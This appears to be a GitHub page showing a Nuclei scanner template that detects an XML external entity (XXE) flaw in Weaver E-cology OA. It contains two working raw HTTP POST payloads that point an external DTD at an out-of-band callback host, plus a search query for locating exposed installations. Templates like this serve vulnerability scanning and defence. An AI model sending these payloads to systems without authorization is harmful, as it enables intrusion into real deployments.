-
Notifications
You must be signed in to change notification settings - Fork 1
/
ecology-deleteUserRequestInfoByXml-xxe.yaml
41 lines (35 loc) · 1.26 KB
/
ecology-deleteUserRequestInfoByXml-xxe.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
id: ecology-deleteuserrequestinfobyxml-xxe
info:
name: E-cology deleteUserRequestInfoByXml - XML Entity Injection
author: Co5mos
severity: critical
description: The initial filtering of user input for a certain feature in the Weaver E-cology system was not very robust, which resulted in the possibility of triggering XXE when processing user input.
reference:
- https://blog.csdn.net/qq_41904294/article/details/131878446
metadata:
max-request: 2
verified: true
hunter-query: product.name="泛微 e-cology 9.0 OA"
tags: weaver,e-cology,xxe
http:
- raw:
- |
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://{{interactsh-url}}">
<M><syscode>&send;</syscode></M>
- |
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://{{interactsh-url}}">
<M><syscode>&send;</syscode></M>
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"